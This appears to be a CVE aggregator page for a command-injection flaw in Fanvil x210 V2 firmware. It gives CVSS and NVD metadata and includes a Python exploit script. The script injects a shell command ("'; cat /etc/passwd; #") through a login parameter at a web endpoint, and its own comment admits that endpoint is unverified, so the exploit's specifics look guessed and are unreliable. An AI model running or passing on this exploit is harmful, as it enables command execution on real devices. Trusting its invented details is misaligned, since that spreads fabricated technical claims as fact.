Security Vulnerability Report
中文
CVE-2025-64052 CVSS 5.1 MEDIUM

CVE-2025-64052

Published: 2025-12-05 16:15:50
Last Modified: 2025-12-31 01:10:32
Source: [email protected]

Description

An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to execute arbitrary system commands.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Fanvil x210 V2 固件版本 <= 2.12.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-64052 PoC - Fanvil x210 V2 Command Injection # Author: Security Researcher # Note: For authorized security testing only import requests import sys def exploit(target_ip, target_port=80): """ Exploit CVE-2025-64052 on Fanvil x210 V2 Requires network access to the target device """ # Target endpoint (specific path needs verification) target_url = f"http://{target_ip}:{target_port}/cgi-bin/luci" # Malicious payload to inject command # Example: Execute reverse shell or read /etc/passwd cmd = "cat /etc/passwd" payload = f"'; {cmd}; #" try: # Construct exploit request params = {"luci_username": payload} response = requests.get(target_url, params=params, timeout=10) print(f"[*] Request sent to {target_url}") print(f"[*] Status code: {response.status_code}") print(f"[*] Response length: {len(response.text)}") if response.status_code == 200: print("[+] Potential command execution detected") print(response.text[:500]) else: print("[-] No response or unexpected status") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) ip = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit(ip, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64052", "sourceIdentifier": "[email protected]", "published": "2025-12-05T16:15:50.047", "lastModified": "2025-12-31T01:10:32.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to execute arbitrary system commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fanvil:x210_firmware:2.12.20:*:*:*:*:*:*:*", "matchCriteriaId": "B5339CEB-DD13-43D9-9DBB-F58EA2EDC47D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fanvil:x210:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "826351F9-626E-4EA9-9634-9E04B462AF4A"}]}]}], "references": [{"url": "http://fanvil.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64052.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.